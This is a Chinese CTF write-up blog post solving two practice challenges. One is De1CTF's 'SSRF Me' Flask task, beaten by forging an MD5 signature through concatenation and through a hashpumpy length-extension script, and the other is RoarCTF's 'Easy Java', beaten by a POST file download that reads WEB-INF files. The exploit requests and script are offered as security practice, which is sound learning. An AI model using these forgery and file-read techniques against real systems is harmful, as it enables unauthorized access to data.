[BUUCTF]刷题记录8

Posted huamanggg

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[BUUCTF]刷题记录8相关的知识,希望对你有一定的参考价值。

[De1CTF 2019]SSRF Me

flask题


#! /usr/bin/env python
#encoding=utf-8
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')

app = Flask(__name__)

secert_key = os.urandom(16)


class Task:
    def __init__(self, action, param, sign, ip):
        self.action = action
        self.param = param
        self.sign = sign
        self.sandbox = md5(ip)
        if(not os.path.exists(self.sandbox)):          #SandBox For Remote_Addr
            os.mkdir(self.sandbox)

    def Exec(self):
        result = {}
        result['code'] = 500
        if (self.checkSign()):
            if "scan" in self.action:
                tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
                resp = scan(self.param)
                if (resp == "Connection Timeout"):
                    result['data'] = resp
                else:
                    print resp
                    tmpfile.write(resp)
                    tmpfile.close()
                result['code'] = 200
            if "read" in self.action:
                f = open("./%s/result.txt" % self.sandbox, 'r')
                result['code'] = 200
                result['data'] = f.read()
            if result['code'] == 500:
                result['data'] = "Action Error"
        else:
            result['code'] = 500
            result['msg'] = "Sign Error"
        return result

    def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False


#generate Sign For Action Scan.
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)


@app.route('/De1ta',methods=['GET','POST'])
def challenge():
    action = urllib.unquote(request.cookies.get("action"))
    param = urllib.unquote(request.args.get("param", ""))
    sign = urllib.unquote(request.cookies.get("sign"))
    ip = request.remote_addr
    if(waf(param)):
        return "No Hacker!!!!"
    task = Task(action, param, sign, ip)
    return json.dumps(task.Exec())
    
@app.route('/')
def index():
    return open("code.txt","r").read()


def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"



def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()


def md5(content):
    return hashlib.md5(content).hexdigest()


def waf(param):
    check=param.strip().lower()
    if check.startswith("gopher") or check.startswith("file"):     
        return True
    else:
        return False


if __name__ == '__main__':
    app.debug = False
    app.run(host='0.0.0.0',port=80)

Exec方法中有两条路走
第一是如果action里面有scan,那么就会执行scan方法,读取param的前五十个字符,然后再写入result.txt

def scan(param):
    socket.setdefaulttimeout(1)
    try:
        return urllib.urlopen(param).read()[:50]
    except:
        return "Connection Timeout"

如果是read在action里面,那么就会读取出result.txt的内容

所以总体的思路就是,先把flag写入result.txt,然后在读result.txt

在进入这两条路之前,会有一个checkSign,这里会指向这样的判断
他会拿现在的action和param去生成一个签名,再与cookie里面的sign去比较

def checkSign(self):
        if (getSign(self.action, self.param) == self.sign):
            return True
        else:
            return False

def getSign(action, param):
    return hashlib.md5(secert_key + param + action).hexdigest()

所以这个Sign我们是可以而且需要去伪造的
这里他是拼接了param和action

生成sign的路由是:
会发现他自己就带了一个scan,那么此时我再去拼接一个read,那么就可以同时满足上面的两条路了
这个时候他是拿flag.txtreadscan去生成sign的

@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
    param = urllib.unquote(request.args.get("param", ""))
    action = "scan"
    return getSign(action, param)

payload:

/geneSign?param=flag.txtread

得到sign

这时候就可以去伪造cookie进行ssrf了
这时候对应的我们的payload就要和我们刚刚生成的sign的模式一样,param=flag.txt,action=readscan,sign=刚刚生成的

成功读取到flag

这里还有第二个方式,hash长度拓展攻击
这里就不是在flag.txt后面接一个read了,是利用hash的这个漏洞来拼接这个read

首先生成一个flag.txt的sign

/geneSign?param=flag.txt

hash拓展脚本

import hashpumpy
# sacn需要拼接一个read
h = "a54fe303932462179e629661e8242c03"
sign = hashpumpy.hashpump(h,'scan','read',24)
print(sign)

得到如下

('6b4b0dfd4023edd12835febbe95dadbe', b'scan\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xe0\\x00\\x00\\x00\\x00\\x00\\x00\\x00read'

这个\\x需要换成%

scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00read

这时候我们拿这个去伪装cookie
成功拿到flag

[RoarCTF 2019]Easy Java

第一次做java站的题
一进去有一个登录框,下面有一个help
会跳转到这个页面

Download?filename=help.docx

但是返回是notfound
换post试了一下,竟然还真下载到了

那么看看能不能去找到WEB-INF/web.xml,找里面的路由

看里面果然有一个flag路由

找他的servlet
这个已经给了com.wm.ctf.FlagController,要去找找前面的目录,刚好最近在搞java开发,对比了一下自己的目录

试了几次,发现这个成功了
/Download?filename=WEB-INF/classes/com/wm/ctf/FlagController.class

以上是关于[BUUCTF]刷题记录8的主要内容,如果未能解决你的问题,请参考以下文章

buuctf 刷题记录 [第二章 web进阶]XSS闯关

CTF刷题记录Buuctf-N1BOOK-SSRF

buuctf 刷题记录 [第一章 web入门]afr_3

BUUCTF(web刷题记录一)

buuctf 刷题记录 [第二章 web进阶]SSRF Training

CTF刷题记录Buuctf_N1BOOK——afr_3